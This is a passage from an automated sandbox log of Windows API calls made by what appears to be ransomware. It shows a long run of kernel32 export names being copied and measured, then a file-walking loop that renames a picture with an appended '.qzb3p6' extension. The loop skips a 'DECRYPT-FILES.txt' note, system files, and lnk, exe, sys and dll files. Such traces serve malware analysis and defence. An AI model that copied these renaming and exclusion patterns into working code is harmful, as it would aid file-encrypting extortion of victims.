lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0086.111] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0086.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0086.111] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0086.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0086.111] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0086.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0086.111] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0086.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0086.112] lstrlenA (lpString="CREATEFILEW") returned 11 [0086.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0086.112] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0086.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0086.112] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0086.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0086.112] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0086.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0086.112] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0086.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0086.112] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0086.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0086.112] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0086.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0086.112] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0086.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0086.112] lstrlenA (lpString="CREATEJOBSET") returned 12 [0086.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0086.112] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0086.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0086.112] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0086.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0086.112] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0086.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0086.112] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0086.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0086.112] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0086.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0086.112] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0086.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0086.112] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0086.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0086.112] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0086.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0086.112] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0086.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0086.113] lstrlenA (lpString="CREATEPIPE") returned 10 [0086.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0086.113] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0086.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0086.113] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0086.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0086.113] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0086.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0086.113] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0086.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0086.113] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0086.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0086.113] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0086.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0086.113] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0086.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0086.113] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0086.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0086.113] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0086.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0086.113] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0086.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0086.113] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0086.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0086.113] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0086.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0086.113] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0086.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0086.113] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0086.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0086.113] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0086.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0086.113] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0086.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0086.113] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0086.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0086.113] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0086.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0086.114] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0086.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0086.114] lstrlenA (lpString="CREATETHREAD") returned 12 [0086.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0086.114] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0086.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0086.114] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0086.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0086.114] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0086.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0086.114] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0086.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0086.114] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0086.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0086.114] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0086.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0086.114] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0086.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0086.114] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0086.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0086.114] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0086.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0086.114] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0086.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0086.114] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0086.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0086.114] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0086.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0086.114] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0086.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0086.114] lstrlenA (lpString="CTRLROUTINE") returned 11 [0086.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0086.114] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0086.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0086.114] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0086.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0086.115] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0086.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0086.115] lstrlenA (lpString="DEBUGBREAK") returned 10 [0086.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0086.115] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0086.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0086.115] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0086.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0086.115] lstrlenA (lpString="DECODEPOINTER") returned 13 [0086.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0086.115] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0086.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0086.115] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0086.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0086.115] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0086.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0086.115] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0086.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0086.115] lstrlenA (lpString="DELETEATOM") returned 10 [0086.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0086.115] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0086.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0086.115] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0086.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0086.115] lstrlenA (lpString="DELETEFIBER") returned 11 [0086.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0086.115] lstrlenA (lpString="DELETEFILEA") returned 11 [0086.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0086.115] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0086.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0086.115] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0086.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0086.115] lstrlenA (lpString="DELETEFILEW") returned 11 [0086.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0086.115] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0086.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0086.116] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0086.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0086.116] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0086.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0086.116] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0086.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0086.116] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0086.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0086.116] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0086.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0086.116] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0086.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0086.116] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0086.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0086.116] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0086.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0086.116] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0086.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0086.116] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0086.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0086.116] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0086.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0086.116] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0086.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0086.116] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0086.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0086.116] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0086.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0086.116] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0086.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0086.116] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0086.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0086.116] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0086.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0086.116] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0086.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0086.117] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0086.117] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0086.117] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0086.117] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0086.117] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0086.117] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0086.117] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0086.117] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0086.117] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0086.117] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0086.117] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0086.117] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0086.117] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0086.117] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0086.117] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0086.117] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0086.117] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0086.117] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0086.117] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0086.117] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0086.117] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0086.117] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0086.117] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0086.117] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0086.117] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0086.117] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0086.117] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0086.117] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0086.117] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.118] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\5H FrCvTzwDbhSv2_.jpg") returned 66 [0086.118] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\5H FrCvTzwDbhSv2_.jpg.qzb3p6") returned 73 [0086.118] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\5H FrCvTzwDbhSv2_.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\5h frcvtzwdbhsv2_.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\5H FrCvTzwDbhSv2_.jpg.qzb3p6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\5h frcvtzwdbhsv2_.jpg.qzb3p6"), dwFlags=0x0) returned 1 [0086.118] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.118] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.119] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.119] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6c7df30, ftCreationTime.dwHighDateTime=0x1d4d020, ftLastAccessTime.dwLowDateTime=0x406f99e0, ftLastAccessTime.dwHighDateTime=0x1d4cc51, ftLastWriteTime.dwLowDateTime=0x406f99e0, ftLastWriteTime.dwHighDateTime=0x1d4cc51, nFileSizeHigh=0x0, nFileSizeLow=0x699d, dwReserved0=0x0, dwReserved1=0x0, cFileName="6pqbaFAB59 bjsw9TrUE.png", cAlternateFileName="6PQBAF~1.PNG")) returned 1 [0086.119] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.png", lpString2="DECRYPT-FILES.txt") returned -1 [0086.119] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.png", lpString2="autorun.inf") returned -1 [0086.119] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.png", lpString2="boot.ini") returned -1 [0086.119] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.png", lpString2="desktop.ini") returned -1 [0086.119] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.png", lpString2="ntuser.dat") returned -1 [0086.119] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.png", lpString2="iconcache.db") returned -1 [0086.119] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.png", lpString2="bootsect.bak") returned -1 [0086.119] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.png", lpString2="ntuser.dat.log") returned -1 [0086.119] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.png", lpString2="thumbs.db") returned -1 [0086.119] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.png", lpString2="Bootfont.bin") returned -1 [0086.119] lstrlenW (lpString="6pqbaFAB59 bjsw9TrUE.png") returned 24 [0086.119] lstrcmpiW (lpString1="png", lpString2="lnk") returned 1 [0086.119] lstrcmpiW (lpString1="png", lpString2="exe") returned 1 [0086.119] lstrcmpiW (lpString1="png", lpString2="sys") returned -1 [0086.119] lstrcmpiW (lpString1="png", lpString2="dll") returned 1 [0086.119] lstrlenW 